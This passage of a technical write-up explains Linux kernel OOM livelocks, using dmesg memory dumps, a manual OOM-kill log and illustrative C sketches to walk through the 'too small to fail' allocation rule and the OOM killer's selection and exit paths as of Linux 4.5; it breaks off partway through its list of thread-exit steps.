[ 104.136563] SysRq : Show Memory [ 104.137695] Mem-Info: [ 104.138539] Node 0 DMA per-cpu: [ 104.139591] CPU 0: hi: 0, btch: 1 usd: 0 [ 104.141033] CPU 1: hi: 0, btch: 1 usd: 0 [ 104.142328] CPU 2: hi: 0, btch: 1 usd: 0 [ 104.143600] CPU 3: hi: 0, btch: 1 usd: 0 [ 104.144856] Node 0 DMA32 per-cpu: [ 104.145869] CPU 0: hi: 186, btch: 31 usd: 30 [ 104.147112] CPU 1: hi: 186, btch: 31 usd: 32 [ 104.148358] CPU 2: hi: 186, btch: 31 usd: 1 [ 104.149592] CPU 3: hi: 186, btch: 31 usd: 30 [ 104.150827] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 104.150827] active_file:0 inactive_file:0 isolated_file:0 [ 104.150827] unevictable:0 dirty:0 writeback:0 unstable:0 [ 104.150827] free:12924 slab_reclaimable:4632 slab_unreclaimable:5619 [ 104.150827] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 104.150827] free_cma:0 [ 104.158594] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 104.168335] lowmem_reserve[]: 0 1720 1720 1720 [ 104.169812] Node 0 DMA32 free:44432kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes [ 104.179790] lowmem_reserve[]: 0 0 0 0 [ 104.181210] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 104.185866] Node 0 DMA32: 868*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44432kB [ 104.190836] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 104.193159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 104.195439] 2162 total pagecache pages [ 104.196881] 0 pages in swap cache [ 104.198244] Swap cache stats: add 0, delete 0, find 0/0 [ 104.199974] Free swap = 0kB [ 104.201274] Total swap = 0kB [ 104.202577] 524157 pages RAM [ 104.203874] 0 pages HighMem/MovableOnly [ 104.205345] 79320 pages reserved (I again pressed SysRq-m in order to show memory state. But the situation did not improve.) 
[ 146.547225] SysRq : Show Memory [ 146.548766] Mem-Info: [ 146.549982] Node 0 DMA per-cpu: [ 146.551486] CPU 0: hi: 0, btch: 1 usd: 0 [ 146.553161] CPU 1: hi: 0, btch: 1 usd: 0 [ 146.554827] CPU 2: hi: 0, btch: 1 usd: 0 [ 146.556593] CPU 3: hi: 0, btch: 1 usd: 0 [ 146.558288] Node 0 DMA32 per-cpu: [ 146.559676] CPU 0: hi: 186, btch: 31 usd: 30 [ 146.561395] CPU 1: hi: 186, btch: 31 usd: 59 [ 146.563010] CPU 2: hi: 186, btch: 31 usd: 1 [ 146.564634] CPU 3: hi: 186, btch: 31 usd: 30 [ 146.566325] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 146.566325] active_file:0 inactive_file:0 isolated_file:0 [ 146.566325] unevictable:0 dirty:0 writeback:0 unstable:0 [ 146.566325] free:12893 slab_reclaimable:4632 slab_unreclaimable:5619 [ 146.566325] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 146.566325] free_cma:0 [ 146.576409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 146.585972] lowmem_reserve[]: 0 1720 1720 1720 [ 146.587814] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes [ 146.599568] lowmem_reserve[]: 0 0 0 0 [ 146.601198] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 146.606977] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB [ 146.612321] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 146.614753] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 146.617125] 2162 total pagecache pages [ 146.618674] 0 pages in swap cache [ 146.620106] Swap cache stats: add 0, delete 0, find 0/0 [ 146.621893] Free swap = 0kB [ 146.623225] Total swap = 0kB [ 146.624538] 524157 pages RAM [ 146.625970] 0 pages HighMem/MovableOnly [ 146.627442] 79320 pages reserved (I pressed SysRq-f in order to invoke the OOM killer. But it did not help.) [ 153.523099] SysRq : Manual OOM execution [ 153.524763] kworker/0:1 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 153.526884] kworker/0:1 cpuset=/ mems_allowed=0 [ 153.528593] CPU: 0 PID: 163 Comm: kworker/0:1 Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 153.530840] Hardware name: VMware, Inc. 
VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 153.533615] Workqueue: events moom_callback [ 153.535183] ffff88007bf73980 00000000dc64ad72 ffff88007ba4fc70 ffffffff81635a0c [ 153.537555] ffff88007ba4fd00 ffffffff816309ac ffffffff81daaa00 ffffffff81a30200 [ 153.539950] 00000000ffff8200 ffff88007ba4fca8 ffffffff8108bec3 ffff88007ba4fcc8 [ 153.542293] Call Trace: [ 153.543642] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 153.545381] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 153.547324] [<ffffffff8108bec3>] ? __internal_add_timer+0x113/0x130 [ 153.549338] [<ffffffff8108bf12>] ? internal_add_timer+0x32/0x70 [ 153.551278] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 153.553271] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 153.555223] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 153.557296] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 153.559240] [<ffffffff813b9f0d>] moom_callback+0x4d/0x50 [ 153.561106] [<ffffffff8109d5fb>] process_one_work+0x17b/0x470 [ 153.563087] [<ffffffff8109e3cb>] worker_thread+0x11b/0x400 [ 153.564985] [<ffffffff8109e2b0>] ? rescuer_thread+0x400/0x400 [ 153.566970] [<ffffffff810a5aef>] kthread+0xcf/0xe0 [ 153.568698] [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140 [ 153.570730] [<ffffffff81646118>] ret_from_fork+0x58/0x90 [ 153.572598] [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140 [ 153.574643] Mem-Info: [ 153.575900] Node 0 DMA per-cpu: [ 153.577241] CPU 0: hi: 0, btch: 1 usd: 0 [ 153.578865] CPU 1: hi: 0, btch: 1 usd: 0 [ 153.580424] CPU 2: hi: 0, btch: 1 usd: 0 [ 153.582002] CPU 3: hi: 0, btch: 1 usd: 0 [ 153.583554] Node 0 DMA32 per-cpu: [ 153.584864] CPU 0: hi: 186, btch: 31 usd: 30 [ 153.586334] CPU 1: hi: 186, btch: 31 usd: 59 [ 153.587830] CPU 2: hi: 186, btch: 31 usd: 1 [ 153.589286] CPU 3: hi: 186, btch: 31 usd: 30 [ 153.590707] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 153.590707] active_file:0 inactive_file:0 isolated_file:0 [ 153.590707] unevictable:0 dirty:0 writeback:0 unstable:0 [ 153.590707] free:12893 slab_reclaimable:4632 slab_unreclaimable:5619 [ 153.590707] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 153.590707] free_cma:0 [ 153.599409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 153.608512] lowmem_reserve[]: 0 1720 1720 1720 [ 153.610098] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? 
yes [ 153.620715] lowmem_reserve[]: 0 0 0 0 [ 153.622939] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 153.627718] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB [ 153.632880] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 153.635206] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 153.637597] 2162 total pagecache pages [ 153.639022] 0 pages in swap cache [ 153.640456] Swap cache stats: add 0, delete 0, find 0/0 [ 153.642204] Free swap = 0kB [ 153.643552] Total swap = 0kB [ 153.644892] 524157 pages RAM [ 153.646150] 0 pages HighMem/MovableOnly [ 153.647650] 79320 pages reserved [ 153.649047] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 153.651334] [ 588] 0 588 9204 387 19 0 0 systemd-journal [ 153.653757] [ 604] 0 604 10814 170 21 0 -1000 systemd-udevd [ 153.656237] [ 912] 0 912 12803 115 25 0 -1000 auditd [ 153.658523] [ 1967] 70 1967 6997 63 18 0 0 avahi-daemon [ 153.660967] [ 1979] 0 1979 72391 919 42 0 0 rsyslogd [ 153.663275] [ 1982] 0 1982 80896 4252 78 0 0 firewalld [ 153.665703] [ 1983] 0 1983 4829 76 14 0 0 irqbalance [ 153.668042] [ 1984] 0 1984 6612 79 15 0 0 systemd-logind [ 153.670465] [ 1985] 81 1985 6672 122 18 0 -900 dbus-daemon [ 153.672794] [ 1990] 70 1990 6997 58 17 0 0 avahi-daemon [ 153.675240] [ 2015] 0 2015 52593 433 56 0 0 abrtd [ 153.677508] [ 2017] 0 2017 51993 339 54 0 0 abrt-watch-log [ 153.679997] [ 2018] 0 2018 1094 24 8 0 0 rngd [ 153.682203] [ 2044] 0 2044 31583 150 21 0 0 crond [ 153.684481] [ 2181] 0 2181 46752 224 41 0 0 vmtoolsd [ 153.686791] [ 2803] 0 2803 27631 3114 51 0 0 dhclient [ 153.689039] [ 2807] 999 2807 132051 2254 54 0 0 polkitd [ 153.691348] [ 2890] 0 2890 20640 216 40 0 -1000 sshd [ 153.693561] [ 2893] 0 2893 138262 2660 91 0 0 tuned [ 153.695769] [ 4096] 0 4096 22785 252 42 0 0 master [ 153.698045] [ 4102] 0 4102 64751 994 57 0 -900 abrt-dbus [ 153.700317] [ 4108] 0 4108 23201 163 51 0 0 login [ 153.702487] [ 4109] 0 4109 27509 33 12 0 0 agetty [ 153.704747] [ 4113] 0 4113 79455 358 104 0 0 nmbd [ 153.706944] [ 4115] 89 4115 22811 249 44 0 0 pickup [ 153.709075] [ 4116] 89 4116 22828 250 45 0 0 qmgr [ 153.711222] [ 4130] 0 4130 96508 528 138 0 0 smbd [ 153.713329] [ 4134] 0 4134 96508 528 132 0 0 smbd [ 153.715421] [ 4137] 1000 4137 28884 130 14 0 0 bash [ 153.717453] [ 4158] 1000 4158 541715 385821 763 0 0 memset+write [ 153.719591] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 153.721674] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 153.723898] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 153.725988] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 153.728070] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 153.730085] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 153.732057] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 153.734018] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 153.735981] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 153.737926] Out of memory: Kill process 4158 (memset+write) score 869 or sacrifice child [ 153.739792] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB ---------- Example output end ----------
(Footnote: The reproducibility of the hangup is not 100%; the likelihood of reproducing it depends on timing and environment. Also, when the system hangs up, the CPU usage may stay at 100% in some cases and at 0% in others.)
The answer is the "too small to fail" memory-allocation rule, which exposed a contradiction inside the memory management subsystem at Christmas 2014.
It turned out that memory allocation requests of order 3 or less (1 byte to 32768 bytes) retry forever until they succeed, unless the OOM killer sets TIF_MEMDIE on the requesting thread.
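The rule is easiest to see as code. The following is a minimal sketch of the decision made in the page allocator's slow path (condensed from the idea of __alloc_pages_slowpath() in mm/page_alloc.c, not the verbatim code; the helper try_reclaim_and_allocate() is hypothetical, while PAGE_ALLOC_COSTLY_ORDER really is 3).
---------- sketch: the "too small to fail" rule ----------
static struct page *alloc_pages_slowpath_sketch(gfp_t gfp_mask, unsigned int order)
{
	struct page *page;
retry:
	page = try_reclaim_and_allocate(gfp_mask, order); /* hypothetical helper */
	if (page)
		return page;
	/* Callers which explicitly allowed failure may fail. */
	if (gfp_mask & __GFP_NORETRY)
		return NULL;
	/*
	 * "Too small to fail": an order <= PAGE_ALLOC_COSTLY_ORDER (= 3)
	 * request behaves as if __GFP_NOFAIL was given, unless the OOM
	 * killer chose the current thread as a victim (TIF_MEMDIE), in
	 * which case memory reserves may be used and failure is allowed.
	 */
	if (order <= PAGE_ALLOC_COSTLY_ORDER && !test_thread_flag(TIF_MEMDIE))
		goto retry; /* loop forever until it succeeds */
	return NULL;
}
---------- sketch: the "too small to fail" rule ----------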
On the other hand, the callers of GFP_NOFS allocation requests (used for performing filesystem writeback operations, as in the xfs filesystem) did not expect such behavior, so they cannot make forward progress unless TIF_MEMDIE is set. As a result, callers of GFP_KERNEL allocation requests (such as applications) are blocked forever by callers of GFP_NOFS allocation requests.
If TIF_MEMDIE were set on a thread doing GFP_NOFS allocation requests, or if GFP_NOFS had higher preference than GFP_KERNEL, the kernel would not block threads doing GFP_KERNEL allocation requests forever. But since the xfs filesystem cooperates among many kernel threads in order to perform complicated operations, it was impossible to set TIF_MEMDIE on the thread doing the GFP_NOFS allocation request, and the result was blocking forever.
This affair became the trigger for thinking seriously about the behavior of the kernel under memory pressure. Until then, this had been a problem which merely made the people involved angry, met with "Your system is already DoS attacked and it is too late to recover. Give up and restart your system." Now the direction of the wind changed drastically.
This became a far more important problem than CVE-2013-4312 (later CVE-2016-2847), and as a troubleshooting staff member at a support center who had handled unexplained hangups, I came to think that we want to avoid this problem by all means.
Due to the aforementioned "too small to fail" memory-allocation rule, doing a memory allocation request with locks held entails the risk of a lockup, because a process which was killed by the OOM killer (and thus has the TIF_MEMDIE flag set) cannot make forward progress while it waits for another process which is doing a memory allocation request with those locks held.
But locks are necessary for exclusion control. And a caller cannot simply allocate the memory in advance, because it cannot determine how much memory is required until exclusion control begins (i.e. the locks are held).
If every location between holding a lock and releasing that lock were killable (i.e. could be interrupted by the SIGKILL signal), this would not be a problem. But not all locations which might allocate memory with a lock held are killable.
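As a minimal kernel-style sketch of this pattern (shared_lock and the two functions are illustrative, not taken from the kernel source):
---------- sketch: allocation with a lock held ----------
static DEFINE_MUTEX(shared_lock);

/* Thread A: allocates memory while holding a lock. */
static void thread_a(void)
{
	void *buf;

	mutex_lock(&shared_lock);
	/*
	 * The "too small to fail" rule makes this request retry forever.
	 * If the OOM killer's victim is thread B below, no memory will
	 * ever be released, so this call never returns...
	 */
	buf = kmalloc(128, GFP_KERNEL);
	kfree(buf);
	mutex_unlock(&shared_lock);
}

/* Thread B: killed by the OOM killer (TIF_MEMDIE is set). */
static void thread_b(void)
{
	/*
	 * ...because thread B must pass through this unkillable wait
	 * before it can exit and release its memory, and the lock is
	 * held by thread A. Neither side makes forward progress.
	 */
	mutex_lock(&shared_lock);
	mutex_unlock(&shared_lock);
}
---------- sketch: allocation with a lock held ----------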
As a result, TIF_MEMDIE not only serves as a mechanism for "not killing more processes than necessary" but also serves as a mechanism for "hanging up the system when the process killed by the OOM killer cannot terminate and release its memory".
This is the OOM livelock situation which occurs when the OOM killer has been invoked.
As a side note, there is also an OOM livelock situation which occurs when the OOM killer is not invoked (i.e. there is no process with TIF_MEMDIE set), which has different causes. Such cases are explained in "Various ambushes, in chronological order?".
This affair occurred one month after the discussion of the memory consumption attack using pipe buffers went to the public mailing lists.
On the public mailing lists, I proposed invoking the OOM killer using a timeout, because there are so many kernel versions which are vulnerable to this attack; I also wanted a workaround for the hangup problems which occur without the OOM killer being invoked, and I put the highest priority on a backportable approach.
But Michal Hocko is rigidly opposed to timeout-based workarounds and asks for a solution which does not use timeouts. Therefore I keep trying to enumerate all of the locations which might result in a hangup, presenting a reproducer and a log whenever possible, and asking him "How can you handle this case without using a timeout?"; such days continue even now.
→ Thanks to such effort, various unexpected ambushes were discovered one after another during this one and a half years. Of course, not all ambushes have been discovered, and some of the discovered ambushes are left unfixed.
In order to avoid convoluting the story, I first explain the OOM reaper, which is a mitigation for the OOM livelock situation in the case where the kernel was able to invoke the OOM killer. (Well, the OOM reaper alone is a long enough story.)
Firstly, I explain the flow of the OOM killer as of Linux 4.5. (The flow of the OOM killer is very complicated and has a history of trial and error; thus the flow might differ in older kernels.)
(kill1) |
out_of_memory() is called when free memory was unavailable (an OOM situation occurred) for an allocation request which either "is of order 3 or less and contains the __GFP_FS flag" or "contains the __GFP_NOFAIL flag". |
(kill2) |
If the current thread has already received SIGKILL or already has the PF_EXITING flag (is terminating), the OOM killer sets the TIF_MEMDIE flag on the current thread and returns to the caller, so that we don't kill more processes than needed, because there is a possibility of producing free memory by releasing the memory associated with the current thread's mm_struct. (Trap 1) |
(kill3) |
Otherwise, select_bad_process() is called from out_of_memory() in order to find a candidate process for forced termination. |
(kill4) |
select_bad_process() calls oom_scan_process_thread() on all threads of all thread groups which exist in the system. If oom_scan_process_thread() returns OOM_SCAN_ABORT, select_bad_process() stops searching for candidates and returns -1 to out_of_memory(). If oom_scan_process_thread() returns OOM_SCAN_SELECT, select_bad_process() marks that thread as the highest candidate; scanning continues, because oom_scan_process_thread() might still return OOM_SCAN_ABORT for some other thread after returning OOM_SCAN_SELECT for this one. If oom_scan_process_thread() returns OOM_SCAN_CONTINUE, select_bad_process() skips that thread. If oom_scan_process_thread() returns OOM_SCAN_OK, select_bad_process() calls oom_badness() on that thread in order to determine its degree of contribution to the OOM situation. If the value returned by oom_badness() (the minimum value is 0) for that thread is larger than the current highest candidate's value, select_bad_process() marks that thread as the new candidate. If there is at least one candidate thread, select_bad_process() returns that thread to out_of_memory(); otherwise, select_bad_process() returns 0 to out_of_memory(). (A condensed sketch of this selection loop follows after this list.) |
(kill5) |
oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer. Firstly, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread is the init process (whose forced termination would lead to a kernel panic) or a kernel thread (which is not suitable for forced termination), in order to make sure that the OOM killer will not terminate that process. Next, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread already has the TIF_MEMDIE flag, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 2) Next, since there is an assumption that the majority of memory consumption is associated with the mm_struct, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread does not have an mm_struct, in order to skip that thread. Next, since it is likely that the cause of the OOM situation is an attempt to delete a swap partition (i.e. the swapoff() system call), oom_scan_process_thread() returns OOM_SCAN_SELECT to select_bad_process() if that thread is trying to delete a swap partition, in order to make sure that the OOM killer forcibly terminates that thread and thereby aborts deleting the swap partition. Next, since there is a possibility that an already-terminating thread can produce free memory by releasing its mm_struct, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread is already terminating, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 3) Otherwise, since such a thread can become a candidate for forced termination by the OOM killer, oom_scan_process_thread() returns OOM_SCAN_OK to select_bad_process(). |
(kill6) |
oom_badness() evaluates the degree of contribution to the OOM situation. Firstly, oom_badness() returns 0 to select_bad_process() if that thread is the init process (whose forced termination would lead to a kernel panic) or a kernel thread (which is not suitable for forced termination), in order to make sure that the OOM killer will not terminate that process. Next, since a thread group none of whose threads has an mm_struct is considered as already terminating, oom_badness() returns 0 to select_bad_process() if none of the threads in the thread group which contains that thread has an mm_struct, in order to skip that thread. Next, since the system administrator does not want the OOM killer to forcibly terminate processes whose oom_score_adj value (the content of /proc/$pid/oom_score_adj ) equals -1000, oom_badness() returns 0 to select_bad_process() if the thread group which contains that thread has an oom_score_adj value of -1000. Otherwise, oom_badness() returns a value larger than 0 to select_bad_process(), based on a score calculated from the memory usage associated with that thread group's mm_struct. |
(kill7) |
Upon returning from select_bad_process(), the candidate process for forced termination has been determined. If select_bad_process() returned -1, out_of_memory() returns to the caller without doing anything. If select_bad_process() returned 0, out_of_memory() triggers a kernel panic. If select_bad_process() returned neither -1 nor 0, out_of_memory() passes that value to oom_kill_process(). |
(kill8) |
oom_kill_process() does the job of forced termination by actually sending the SIGKILL signal. Firstly, if that process is already terminating, the OOM killer sets the TIF_MEMDIE flag on that thread and returns to the caller, so that we don't kill more processes than needed, because there is a possibility of producing free memory by releasing the memory associated with that thread's mm_struct. (Trap 4) Next, the OOM killer prints the messages which indicate that the OOM killer was invoked. This is the first stage at which the administrator can confirm that the OOM killer was invoked; if an OOM livelock situation occurred prior to this stage, it looks as if the system hung up without any messages. Next, the OOM killer checks all child processes of the process which contains that thread, and if it finds a child process which is suitable for forced termination, it selects that child process as the final candidate. This is based on the heuristic that "killing a child process likely does smaller damage to the system than killing a parent process". I consider that the OOM killer should not select a child process if that thread was selected via OOM_SCAN_SELECT, because the OOM killer will then needlessly kill all child processes of that thread, but the OOM killer unconditionally tries to select a child. This is based on the heuristic that "it is unlikely that a process which is deleting a swap partition has child processes". At this point, the thread group for forced termination is finalized. |
(kill9) |
The OOM killer sends the SIGKILL signal to the thread group containing that thread, and sets the TIF_MEMDIE flag on the first thread which has an mm_struct in that thread group. The reason why the TIF_MEMDIE flag is set on a thread which has an mm_struct is explained later. |
(kill10) |
Also, the OOM killer sends the SIGKILL signal to all thread groups sharing that mm_struct, if they are suitable for forced termination. There is a comment in the source code that "this is necessary for avoiding an OOM livelock caused by mm->mmap_sem", but there is no guarantee that we can reliably avoid it; it just reduces the possibility of an OOM livelock caused by mm->mmap_sem. (Trap 5) Also, there is a comment that "threads which were forcibly terminated but did not get the TIF_MEMDIE flag are no problem, because such threads will get TIF_MEMDIE the next time out_of_memory() is called, for they have already received the SIGKILL signal", but there is no guarantee that the TIF_MEMDIE flag is set reliably. (Trap 6) |
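Here is the condensed sketch of the selection loop from (kill4) to (kill6) promised above (simplified signatures; the real functions in mm/oom_kill.c as of Linux 4.5 take more parameters):
---------- sketch: victim selection (Linux 4.5) ----------
static struct task_struct *select_bad_process_sketch(unsigned long *ppoints)
{
	struct task_struct *chosen = NULL;
	struct task_struct *g, *p;

	*ppoints = 0;
	for_each_process_thread(g, p) {
		unsigned long points;

		switch (oom_scan_process_thread(p)) {
		case OOM_SCAN_ABORT:		/* a TIF_MEMDIE or terminating thread exists */
			return (struct task_struct *)(-1UL);
		case OOM_SCAN_SELECT:		/* e.g. a thread doing swapoff() */
			chosen = p;
			*ppoints = ULONG_MAX;
			continue;
		case OOM_SCAN_CONTINUE:		/* init, kernel thread, or no mm_struct */
			continue;
		case OOM_SCAN_OK:
			break;
		}
		points = oom_badness(p);	/* 0 means "never pick this one" */
		if (points > *ppoints) {
			chosen = p;
			*ppoints = points;
		}
	}
	return chosen;	/* NULL (i.e. 0): no candidate, out_of_memory() panics */
}
---------- sketch: victim selection (Linux 4.5) ----------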
(Trap 1) to (Trap 6) are pitfalls where the OOM livelock situation can occur if the kernel waits, forever and unconditionally, for that situation to resolve itself. But you are probably not yet sure why they can become traps. Therefore, I explain the flow of terminating a thread (mainly the steps until the mm_struct is disassociated and the TIF_MEMDIE flag is cleared).
(exit1) |
A terminating thread calls the do_exit() function. If that thread is terminating voluntarily, it will be able to call do_exit() smoothly. But if that thread is being terminated forcibly by the OOM killer, it is possible that the thread is unable to call do_exit() because it is blocked in an unkillable wait. If the cause of being blocked in an unkillable wait is a memory allocation request, the thread won't be able to leave the unkillable wait until that memory allocation succeeds or fails. If that thread is doing a memory allocation request and has already received the SIGKILL signal, the TIF_MEMDIE flag will be set due to (kill2), and the thread can complete that memory allocation request. But if that thread is waiting, with locks held, for memory allocations by other threads, those threads can't complete their memory allocation requests unless the TIF_MEMDIE flag is set on them due to (kill2) or (kill9). That is, (Trap 2) is "the typical OOM livelock situation which occurs when the OOM killer was invoked", caused by TIF_MEMDIE not being set on the threads doing the memory allocation. Also, (Trap 6) is caused by the fact that, as explained at (kill1), the OOM killer is not invoked unless the allocation request either "is of order 3 or less and contains the __GFP_FS flag" or "contains the __GFP_NOFAIL flag". For example, if that thread is doing a GFP_NOFS or GFP_NOIO allocation request of order 3 or less, the TIF_MEMDIE flag will not be set on that thread due to (kill2) even if it has already received the SIGKILL signal, and the OOM livelock situation occurs due to the "too small to fail" memory-allocation rule, because that memory allocation request loops forever while the OOM killer is never called. And (Trap 1) occurs when TIF_MEMDIE is not set on other threads due to (kill5), after TIF_MEMDIE was set on one thread due to (kill2) and that thread completed its memory allocation request and then started waiting for memory allocations by other threads. |
(exit2) |
The steps from here on assume that the terminating thread was able to call do_exit(). A terminating thread gets the PF_EXITING flag, which indicates that "this thread is terminating", by calling exit_signals(). This allows the current thread to get TIF_MEMDIE due to (kill2). |
(exit3) |
A terminating thread calls exit_mm() in order to release its mm_struct. In exit_mm(), mmap_sem is held in shared mode (down_read(&current->mm->mmap_sem)) in order to synchronize with operations for forced termination due to invalid memory access (the core dump operation). Being blocked while trying to hold mmap_sem in shared mode means that somewhere holds mmap_sem in exclusive mode. While there are several locations which hold mmap_sem in exclusive mode, a typical one is the mmap() operation: mmap() holds mmap_sem in exclusive mode (down_write(&current->mm->mmap_sem)) and then does memory allocation requests. Therefore, (Trap 3) happens when thread-A in a multi-threaded process is in an unkillable wait at down_read(&current->mm->mmap_sem) after the PF_EXITING flag was set, and thread-B tries to invoke the OOM killer by doing a memory allocation request after down_write(&current->mm->mmap_sem): the OOM killer waits for thread-A, which already got the PF_EXITING flag, to release the mm_struct, because the OOM killer fails to understand that thread-B needs to release mmap_sem held in exclusive mode in order to allow thread-A to release the mm_struct (this interplay is sketched after this list). (Trap 5) is caused by falling into a situation where other threads which passed down_write(&current->mm->mmap_sem) are blocked in an unkillable wait (inside or outside of a memory allocation request) and thus cannot release mmap_sem held in exclusive mode. Similarly, (Trap 4) is caused by not sending SIGKILL to other threads which passed down_write(&current->mm->mmap_sem) and are blocked in an unkillable or killable wait. |
(exit4) |
